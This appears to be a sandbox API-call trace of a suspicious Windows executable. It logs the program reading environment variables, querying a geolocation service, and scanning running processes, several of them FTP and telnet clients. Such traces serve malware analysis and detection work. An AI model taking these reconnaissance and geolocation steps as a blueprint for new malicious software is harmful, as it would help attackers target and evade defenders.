0x7c [0100.747] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x80) returned 0xa11328 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.747] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x15) returned 0xa112b0 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0xa112b0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0100.747] GetLastError () returned 0x0 [0100.747] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x80 [0100.747] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x84) returned 0xa11328 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0100.747] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1e) returned 0xa0ef38 [0100.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0xa0ef38, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0100.747] GetLastError () returned 0x0 [0100.747] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x84 [0100.747] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x88) returned 0xa11328 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0100.748] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x2a) returned 0xa0b148 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0xa0b148, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0100.748] GetLastError () returned 0x0 [0100.748] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x88 [0100.748] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x8c) returned 0xa11328 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.748] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x12) returned 0xa112d0 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0xa112d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0100.748] GetLastError () returned 0x0 [0100.748] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x8c [0100.748] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x90) returned 0xa11328 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.748] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x18) returned 0xa113c0 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0xa113c0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0100.748] GetLastError () returned 0x0 [0100.748] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11328) returned 0x90 [0100.748] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11328, Size=0x94) returned 0xa113e0 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0100.748] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x46) returned 0xa06ba0 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0xa06ba0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0100.748] GetLastError () returned 0x0 [0100.748] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa113e0) returned 0x94 [0100.748] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa113e0, Size=0x98) returned 0xa113e0 [0100.748] GetLastError () returned 0x0 [0100.965] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0100.966] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0100.966] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0100.975] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x8ec) returned 0xa11480 [0101.138] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0101.138] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x10) returned 0xa0e610 [0101.138] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0101.139] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0101.139] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0101.356] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0101.376] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0105.063] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x40) returned 0xa05358 [0105.072] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0140.444] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa05358 | out: hHeap=0x9f0000) returned 1 [0140.450] GetCurrentProcess () returned 0xffffffff [0140.450] GetLastError () returned 0x2efe [0140.450] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0140.459] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x10) returned 0xa1df58 [0140.468] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x8ec) returned 0x3b04930 [0140.485] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x800) returned 0xa5a188 [0140.485] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa5a188, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe")) returned 0x3a [0140.485] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0140.494] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x810) returned 0xa5a990 [0140.494] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" " [0140.494] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" ", pNumArgs=0x18de68 | out: pNumArgs=0x18de68) returned 0xa38ac8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0140.494] lstrcpyW (in: lpString1=0x18eaf8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0140.517] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" " [0140.517] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" ", pNumArgs=0x18de04 | out: pNumArgs=0x18de04) returned 0xa38ac8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" [0140.517] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned="OnB5h0yX46mreVq4.exe" [0140.517] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0140.517] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0140.518] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0140.518] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0140.518] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0140.740] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0140.740] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0140.740] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0140.740] EnumProcesses (in: lpidProcess=0x183600, cb=0xa000, lpcbNeeded=0x18de10 | out: lpidProcess=0x183600, lpcbNeeded=0x18de10) returned 1 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0140.744] CloseHandle (hObject=0x0) returned 0 [0140.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0140.745] CloseHandle (hObject=0x0) returned 0 [0140.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x3e0 [0140.745] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0140.746] CloseHandle (hObject=0x3e0) returned 1 [0140.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x3e0 [0140.746] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0140.746] CloseHandle (hObject=0x3e0) returned 1 [0140.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0140.746] CloseHandle (hObject=0x0) returned 0 [0140.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0140.746] CloseHandle (hObject=0x0) returned 0 [0140.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3e0 [0140.746] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0140.746] CloseHandle (hObject=0x3e0) returned 1 [0140.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x3e0 [0140.746] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 0 [0140.746] CloseHandle (hObject=0x3e0) returned 1 [0140.746] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x3e0 [0140.746] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.748] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xd60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="chi.exe") returned 0x7 [0140.748] CloseHandle (hObject=0x3e0) returned 1 [0140.748] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x3e0 [0140.748] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.749] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x310000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="amp.exe") returned 0x7 [0140.749] CloseHandle (hObject=0x3e0) returned 1 [0140.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x3e0 [0140.749] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.750] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xe10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="sherman-nomination.exe") returned 0x16 [0140.751] CloseHandle (hObject=0x3e0) returned 1 [0140.751] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x3e0 [0140.751] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.752] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x8b0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="checking_integration_majority.exe") returned 0x21 [0140.752] CloseHandle (hObject=0x3e0) returned 1 [0140.752] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x3e0 [0140.752] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.753] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x250000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="frcarefultypical.exe") returned 0x14 [0140.754] CloseHandle (hObject=0x3e0) returned 1 [0140.754] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x3e0 [0140.754] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.755] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1170000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="ec_lessons.exe") returned 0xe [0140.755] CloseHandle (hObject=0x3e0) returned 1 [0140.755] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x3e0 [0140.755] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.756] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xa50000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="homeland-used.exe") returned 0x11 [0140.756] CloseHandle (hObject=0x3e0) returned 1 [0140.756] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x488) returned 0x3e0 [0140.757] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.758] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xe60000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="shipped_hormone.exe") returned 0x13 [0140.758] CloseHandle (hObject=0x3e0) returned 1 [0140.758] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x3e0 [0140.758] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.759] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="cambridge knowing.exe") returned 0x15 [0140.759] CloseHandle (hObject=0x3e0) returned 1 [0140.759] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a4) returned 0x3e0 [0140.759] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.760] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1390000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="maritime institutional.exe") returned 0x1a [0140.761] CloseHandle (hObject=0x3e0) returned 1 [0140.761] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x3e0 [0140.761] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.762] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1f0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="conditioning-surf-detection.exe") returned 0x1f [0140.762] CloseHandle (hObject=0x3e0) returned 1 [0140.762] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x3e0 [0140.763] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.764] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xc90000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="muscles.exe") returned 0xb [0140.764] CloseHandle (hObject=0x3e0) returned 1 [0140.764] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x3e0 [0140.764] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.765] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xc00000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="mark drugs.exe") returned 0xe [0140.765] CloseHandle (hObject=0x3e0) returned 1 [0140.765] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x3e0 [0140.765] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.766] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xf10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="anybody.exe") returned 0xb [0140.767] CloseHandle (hObject=0x3e0) returned 1 [0140.767] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x3e0 [0140.767] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.768] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xcf0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="borders-connected.exe") returned 0x15 [0140.768] CloseHandle (hObject=0x3e0) returned 1 [0140.768] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x3e0 [0140.768] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.769] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x1180000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0140.769] CloseHandle (hObject=0x3e0) returned 1 [0140.770] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x3e0 [0140.770] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.771] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xa40000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0140.771] CloseHandle (hObject=0x3e0) returned 1 [0140.771] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x3e0 [0140.771] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.772] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xf20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0140.772] CloseHandle (hObject=0x3e0) returned 1 [0140.772] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x3e0 [0140.772] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.773] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xab0000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0140.774] CloseHandle (hObject=0x3e0) returned 1 [0140.774] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x3e0 [0140.774] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.775] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x120000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0140.775] CloseHandle (hObject=0x3e0) returned 1 [0140.775] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x308) returned 0x3e0 [0140.775] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.776] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xe20000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0140.777] CloseHandle (hObject=0x3e0) returned 1 [0140.777] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x3e0 [0140.777] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.778] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0xb10000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0140.778] CloseHandle (hObject=0x3e0) returned 1 [0140.778] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x3e0 [0140.778] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 [0140.779] GetModuleBaseNameW (in: hProcess=0x3e0, hModule=0x160000, lpBaseName=0x18d600, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0140.780] CloseHandle (hObject=0x3e0) returned 1 [0140.780] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x3e0 [0140.780] EnumProcessModules (in: hProcess=0x3e0, lphModule=0x18de1c, cb=0x4, lpcbNeeded=0x18de00 | out: lphModule=0x18de1c, lpcbNeeded=0x18de00) returned 1 